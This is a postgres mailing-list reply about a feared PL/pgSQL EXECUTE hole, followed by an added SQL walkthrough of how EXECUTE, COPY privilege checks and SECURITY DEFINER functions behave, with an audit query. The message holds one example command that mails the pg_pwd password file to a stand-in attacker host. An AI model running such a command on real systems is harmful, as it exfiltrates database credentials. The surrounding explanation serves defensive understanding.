Re: Security hole in PL/pgSQL - Mailing list pgsql-hackers

From KuroiNeko
Subject Re: Security hole in PL/pgSQL
Date
Msg-id 3A75A072.nail2N52XPYU6@ed.ed
Whole thread Raw
In response to Security hole in PL/pgSQL  (Jan Wieck <janwieck@Yahoo.com>)
Responses Re: Security hole in PL/pgSQL  ("Dominic J. Eidson" <sauron@the-infinite.org>)
Re: Security hole in PL/pgSQL  (Jan Wieck <janwieck@Yahoo.com>)
List pgsql-hackers
> Huh? This would only be true if all operations inside plpgsql are
> executed as superuser, which they are not. Seems to me the existing
> defense against non-superuser using COPY is sufficient.
Sorry if I missed the point, but if I got it right, PL/pgSQL EXECUTE will
allow execution of any program via an exec*() call? If so, this will allow any
(system) user to execute arbitrary code as the postgres (system) user, right?
If so, how can something like

EXECUTE '/bin/mail badguy@evilhost < /usr/pgsql/data/pg_pwd';

be avoided?


--



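As an added illustration, not part of the thread and not PostgreSQL's own code: what PL/pgSQL EXECUTE actually does with the string from the message above, where the file-access privilege check really lives (inside COPY, not in EXECUTE), and the one configuration that would bypass it. The function name run_dynamic, the path /tmp/anything and the audit query at the end are assumptions made for the example; it uses $$ quoting and COPY (query) TO, so it needs PostgreSQL 8.2 or later rather than the 7.1 the thread discusses.

```sql
-- Added example (not from the thread). A thin wrapper that hands an
-- arbitrary string to PL/pgSQL EXECUTE; run_dynamic is a made-up name.
CREATE OR REPLACE FUNCTION run_dynamic(cmd text) RETURNS void
LANGUAGE plpgsql AS $$
BEGIN
    -- EXECUTE parses and runs cmd as an SQL statement inside the current
    -- backend, under the privileges of the calling role. It never reaches
    -- exec*() or a shell: no program is launched here at all.
    EXECUTE cmd;
END
$$;

-- 1. The command line from the message is simply not SQL, so the backend
--    rejects it at parse time with a syntax error; nothing is mailed.
SELECT run_dynamic('/bin/mail badguy@evilhost < /usr/pgsql/data/pg_pwd');

-- 2. The statement that really can touch files in the data directory is
--    COPY ... TO/FROM 'server-side path'. Wrapping it in EXECUTE changes
--    nothing: the privilege check runs inside COPY itself, so an ordinary
--    (non-superuser) role is refused with "must be superuser ... to COPY
--    to or from a file" (current releases also accept members of the
--    pg_read_server_files / pg_write_server_files roles).
SELECT run_dynamic($q$ COPY (SELECT 1) TO '/tmp/anything' $q$);

-- 3. Caveat worth checking: the privilege that matters is the one the
--    function body runs with. As defined above the function is SECURITY
--    INVOKER (the default), so the caller's rights apply. Had a superuser
--    created it with SECURITY DEFINER instead, the same COPY would run with
--    the owner's superuser rights and the file check would pass.
--    The audit query below lists plpgsql functions that are SECURITY
--    DEFINER and owned by a superuser, which is the combination to review.
SELECT n.nspname, p.proname, r.rolname AS owner
FROM pg_proc p
JOIN pg_namespace n ON n.oid = p.pronamespace
JOIN pg_roles     r ON r.oid = p.proowner
JOIN pg_language  l ON l.oid = p.prolang
WHERE p.prosecdef AND r.rolsuper AND l.lanname = 'plpgsql';
```

Run the first two SELECTs as a role without superuser rights to see both refusals; the audit query needs only read access to the system catalogs.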